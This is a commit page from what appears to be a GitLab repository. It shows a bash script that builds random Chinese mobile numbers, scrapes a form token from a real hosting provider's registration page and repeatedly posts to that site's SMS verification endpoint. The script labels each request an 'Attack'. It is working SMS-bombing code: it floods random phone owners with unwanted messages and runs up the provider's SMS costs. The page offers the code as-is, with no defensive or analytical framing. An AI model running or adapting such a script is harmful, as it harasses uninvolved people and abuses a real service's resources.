Commit 72cf4255 authored by nanahira's avatar nanahira

log

parent d67ec1d0
Pipeline #2893 passed with stages
in 1 minute and 50 seconds
#!/bin/bash
attackCount=0
_attack() {
attackCount=$((attackCount + 1))
mobile=13$((RANDOM % 9000 + 1000))$((RANDOM % 90000 + 10000))
echo "Attack $attackCount to $mobile"
token=$(curl -sL --connect-timeout 30 'https://www.coalcloud.net/register.php' | grep -oP '<input type="hidden" name="token" value="[a-z0-9]+" />' | sed 's/<input type="hidden" name="token" value="//g;s/" \/>//g')
curl -sL --connect-timeout 30 -X POST 'https://www.coalcloud.net/modules/addons/SMS_Verification/action.php?action=send' -d "phone=$mobile" -d "token=$token" | jq
}
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment